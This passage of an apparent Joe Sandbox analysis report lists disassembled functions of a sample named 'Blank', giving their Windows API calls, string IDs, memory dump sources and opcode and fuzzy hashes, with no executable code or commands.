                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconLoad
                                                                                                                                    • String ID: ,z20z2$,z20z2$blank$info$question$stop$warning
                                                                                                                                    • API String ID: 2457776203-1387867981
                                                                                                                                    • Opcode ID: 78234d2c8dfe959e65ec267722fe0b07a117866d35c3b526d45b2bf539b93be1
                                                                                                                                    • Instruction ID: 4679b7d99349fb1a05ddbd41fea1fd860ea108be44c8bdceb94968fe5e37e6dd
                                                                                                                                    • Opcode Fuzzy Hash: 78234d2c8dfe959e65ec267722fe0b07a117866d35c3b526d45b2bf539b93be1
                                                                                                                                    • Instruction Fuzzy Hash: 8D113835668303BEE705DE14DC82EBA779CDF0DBA0B50452EF904661C1E7E46F604AA0
                                                                                                                                    Function 002B9B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00271A36: _memmove.LIBCMT ref: 00271A77
                                                                                                                                      • Part of subcall function 002BB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002BB7BD
                                                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 002B9BCC
                                                                                                                                    • GetDlgCtrlID.USER32 ref: 002B9BD7
                                                                                                                                    • GetParent.USER32 ref: 002B9BF3
                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 002B9BF6
                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 002B9BFF
                                                                                                                                    • GetParent.USER32(?), ref: 002B9C1B
                                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 002B9C1E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 1536045017-1403004172
                                                                                                                                    • Opcode ID: 5e6ce2ddb9fd9b5f673bfb70aed647c51ceba6e0ebd3d9271ae79de302f1b298
                                                                                                                                    • Instruction ID: 2a7cc5c83e53a7b7a38b8c36e1a35914ab0c5b062193d90014d8648364df30cf
                                                                                                                                    • Opcode Fuzzy Hash: 5e6ce2ddb9fd9b5f673bfb70aed647c51ceba6e0ebd3d9271ae79de302f1b298
                                                                                                                                    • Instruction Fuzzy Hash: F321B075910104BBCF05EBA4DC89EFEBBA9EF99350F104116F9A193292DB749874DE20
                                                                                                                                    Function 002B9C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00271A36: _memmove.LIBCMT ref: 00271A77
                                                                                                                                      • Part of subcall function 002BB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002BB7BD
                                                                                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 002B9CB5
                                                                                                                                    • GetDlgCtrlID.USER32 ref: 002B9CC0
                                                                                                                                    • GetParent.USER32 ref: 002B9CDC
                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 002B9CDF
                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 002B9CE8
                                                                                                                                    • GetParent.USER32(?), ref: 002B9D04
                                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 002B9D07
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 1536045017-1403004172
                                                                                                                                    • Opcode ID: 7e3d9899493ac4a2998c0fb578a3c90e4bd10b66a029b7d133019c65ddb97d09
                                                                                                                                    • Instruction ID: 6ea1591172e4d67603d24433ac295ec2e8701d9684f1dc7c2094f4b438796c22
                                                                                                                                    • Opcode Fuzzy Hash: 7e3d9899493ac4a2998c0fb578a3c90e4bd10b66a029b7d133019c65ddb97d09
                                                                                                                                    • Instruction Fuzzy Hash: 57210071A10104BBCF01AFA4CC89EFEBBB9EF88340F104016FA51932A2DB758874DE20
                                                                                                                                    Function 002B9D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetParent.USER32 ref: 002B9D27
                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 002B9D3C
                                                                                                                                    • _wcscmp.LIBCMT ref: 002B9D4E
                                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 002B9DC9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                    • API String ID: 1704125052-3381328864
                                                                                                                                    • Opcode ID: 0b3a748e58405dba7c6f403ca628d11b80ca6816ea80933120ed5ff5910b18e1
                                                                                                                                    • Instruction ID: 509cd61f3415ebca9d3c4a089c122fdf32cc7a25e21dd024fa814dd2c943432a
                                                                                                                                    • Opcode Fuzzy Hash: 0b3a748e58405dba7c6f403ca628d11b80ca6816ea80933120ed5ff5910b18e1
                                                                                                                                    • Instruction Fuzzy Hash: 80115C7A26D303BAF6057625EC0ADE6739CDF06BB1B200026FB04A00D1FED569F08E54
                                                                                                                                    Function 002D8F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • #8.OLEAUT32(?), ref: 002D8FC1
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 002D8FEE
                                                                                                                                    • CoUninitialize.OLE32 ref: 002D8FF8
                                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 002D90F8
                                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 002D9225
                                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,002F3BDC), ref: 002D9259
                                                                                                                                    • CoGetObject.OLE32(?,00000000,002F3BDC,?), ref: 002D927C
                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 002D928F
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002D930F
                                                                                                                                    • #9.WSOCK32(?), ref: 002D931F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$Object$FileFromInitializeInstanceRunningTableUninitialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3414436084-0
                                                                                                                                    • Opcode ID: 261785bc52b46fe46d4ab975dae85bac3fbccc2882b7405471b962ea77ff4447
                                                                                                                                    • Instruction ID: f5b1e60ae8aad76752bbdde54ce735ef66e8dbc749125198e5266ad1ae8ff19f
                                                                                                                                    • Opcode Fuzzy Hash: 261785bc52b46fe46d4ab975dae85bac3fbccc2882b7405471b962ea77ff4447
                                                                                                                                    • Instruction Fuzzy Hash: CDC13471218305AFD700EF68C88892AB7E9FF89348F00491EF98A9B351DB71ED55CB52
                                                                                                                                    Function 002C7F4B Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • #77.OLEAUT32(00000000,?,00000002,?,00000000,00000000,?,?,?,?,?,002C7B47,?,?,?,?), ref: 002C8027
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1c30403c300a90a39e6c7593cf382e8337cfdb7eed45f6e79dd70cc4df6bf6c0
                                                                                                                                    • Instruction ID: 4dbad10f080919b68326f5c3abebae4073b14fa81071975d2af1b5a39a0f7af9
                                                                                                                                    • Opcode Fuzzy Hash: 1c30403c300a90a39e6c7593cf382e8337cfdb7eed45f6e79dd70cc4df6bf6c0
                                                                                                                                    • Instruction Fuzzy Hash: 43B19E75A2020A9FDB00DF94D889FBEB7B4EF09321F14822DEA41E7251DB74A951CF91
                                                                                                                                    Function 002C19CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 002C19EF
                                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,002C0A67,?,00000001), ref: 002C1A03
                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 002C1A0A
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002C0A67,?,00000001), ref: 002C1A19
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 002C1A2B
                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,002C0A67,?,00000001), ref: 002C1A44
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002C0A67,?,00000001), ref: 002C1A56
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002C0A67,?,00000001), ref: 002C1A9B
                                                                                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,002C0A67,?,00000001), ref: 002C1AB0
                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,002C0A67,?,00000001), ref: 002C1ABB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                    • Opcode ID: 512f216f35e1d31cfb12e3ee710b9351c1defa14607e5414c64c3142635cb7f7
                                                                                                                                    • Instruction ID: 390052ac5060a6350194a268768a04b3b6428328f16d15484723884efaccd2df
                                                                                                                                    • Opcode Fuzzy Hash: 512f216f35e1d31cfb12e3ee710b9351c1defa14607e5414c64c3142635cb7f7
                                                                                                                                    • Instruction Fuzzy Hash: 6931E171522205BFEB219F50ED89F7977AEEB56365F10822DF800C6192CBB49D60CF50
                                                                                                                                    Function 0029C0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetSysColor.USER32(00000008), ref: 0026260D
                                                                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 00262617
                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0026262C
                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 00262634
                                                                                                                                    • GetClientRect.USER32(?), ref: 0029C0FC
                                                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0029C113
                                                                                                                                    • GetWindowDC.USER32(?), ref: 0029C11F
                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0029C12E
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0029C140
                                                                                                                                    • GetSysColor.USER32(00000005), ref: 0029C15E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3430376129-0
                                                                                                                                    • Opcode ID: 892e4b895c53d245991a8f295b2dab1d09fed1529086c0820893271f03596c01
                                                                                                                                    • Instruction ID: 0e537b0d4d1c6961e4c19e3702cdb79a2931f619ac289fe83ffc156fa23318bb
                                                                                                                                    • Opcode Fuzzy Hash: 892e4b895c53d245991a8f295b2dab1d09fed1529086c0820893271f03596c01
                                                                                                                                    • Instruction Fuzzy Hash: 71115931510205EFDB615FA4EC8CBB97BA5FB08371F504235FA6A950E2CB7109A1EF11
                                                                                                                                    Function 0026AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0026ADE1
                                                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 0026AE80
                                                                                                                                    • UnregisterHotKey.USER32(?), ref: 0026AFD7
                                                                                                                                    • DestroyWindow.USER32(?), ref: 002A2F64
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 002A2FC9
                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 002A2FF6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                    • String ID: close all
                                                                                                                                    • API String ID: 469580280-3243417748
                                                                                                                                    • Opcode ID: 9032d170adaef7f87aa881ad66b2b524de10edd48c1a2fddc9ff1625d7303243
                                                                                                                                    • Instruction ID: 93b9c15978d19fe335ee30b1a543460297408dc132c37d52ecb8e25ef44f4892
                                                                                                                                    • Opcode Fuzzy Hash: 9032d170adaef7f87aa881ad66b2b524de10edd48c1a2fddc9ff1625d7303243
                                                                                                                                    • Instruction Fuzzy Hash: 22A15A70722212CFCB29EF54C495A69F764BF05740F1482ADE80AAB652CB31AD76CF91
                                                                                                                                    Function 002BAD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnumChildWindows.USER32(?,002BB13A), ref: 002BB078
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ChildEnumWindows
                                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                    • API String ID: 3555792229-1603158881
                                                                                                                                    • Opcode ID: 996be1c86e3953c90a6ec53f530d8bfea591e7f0732f445f1a76e8eab0c45340
                                                                                                                                    • Instruction ID: 550e3de2fabb1a2a69e76ac7bbc2a346f6dea60d5dd0d585e7631c9ae3c90222
                                                                                                                                    • Opcode Fuzzy Hash: 996be1c86e3953c90a6ec53f530d8bfea591e7f0732f445f1a76e8eab0c45340
                                                                                                                                    • Instruction Fuzzy Hash: 12919270620506EACB19EF60C481BEEFB75BF04380F548119E85EA7191DF71A9B9CB91
                                                                                                                                    Function 002631F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 0026327E
                                                                                                                                      • Part of subcall function 0026218F: GetClientRect.USER32(?,?), ref: 002621B8
                                                                                                                                      • Part of subcall function 0026218F: GetWindowRect.USER32(?,?), ref: 002621F9
                                                                                                                                      • Part of subcall function 0026218F: ScreenToClient.USER32(?,?), ref: 00262221
                                                                                                                                    • GetDC.USER32 ref: 0029D073
                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0029D086
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0029D094
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0029D0A9
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0029D0B1
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0029D13C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                    • String ID: U
                                                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                                                    • Opcode ID: 50be325b8d265e044c0e7cc7d1b72276d98fd7792efa2e2af87038d0df045afb
                                                                                                                                    • Instruction ID: 98858f172a180e44442ed58f1cb016c11054d39cfa089688e556f903d1acc7db
                                                                                                                                    • Opcode Fuzzy Hash: 50be325b8d265e044c0e7cc7d1b72276d98fd7792efa2e2af87038d0df045afb
                                                                                                                                    • Instruction Fuzzy Hash: 2A710131424206EFCF21CF64CC95ABA7BB5FF49360F144269ED595A1A6C7318CA2EF60
                                                                                                                                    Function 002EC634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002629E2: GetWindowLongW.USER32(?,000000EB), ref: 002629F3
                                                                                                                                      • Part of subcall function 00262714: GetCursorPos.USER32(?), ref: 00262727
                                                                                                                                      • Part of subcall function 00262714: ScreenToClient.USER32(003277B0,?), ref: 00262744
                                                                                                                                      • Part of subcall function 00262714: GetAsyncKeyState.USER32(?), ref: 00262769
                                                                                                                                      • Part of subcall function 00262714: GetAsyncKeyState.USER32(?), ref: 00262777
                                                                                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 002EC69C
                                                                                                                                    • ImageList_EndDrag.COMCTL32 ref: 002EC6A2
                                                                                                                                    • ReleaseCapture.USER32 ref: 002EC6A8
                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 002EC752
                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 002EC765
                                                                                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 002EC847
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                    • API String ID: 1924731296-2107944366
                                                                                                                                    • Opcode ID: 1371acb6c6b0169d74cef5be623178ee8ec1518b2a38fd80cf84fd536e4e4c7c
                                                                                                                                    • Instruction ID: 4ede70c5d4c07c0bb2f732648ee6f1fae5ea963b1bbeb650cd5bf20cf8316334
                                                                                                                                    • Opcode Fuzzy Hash: 1371acb6c6b0169d74cef5be623178ee8ec1518b2a38fd80cf84fd536e4e4c7c
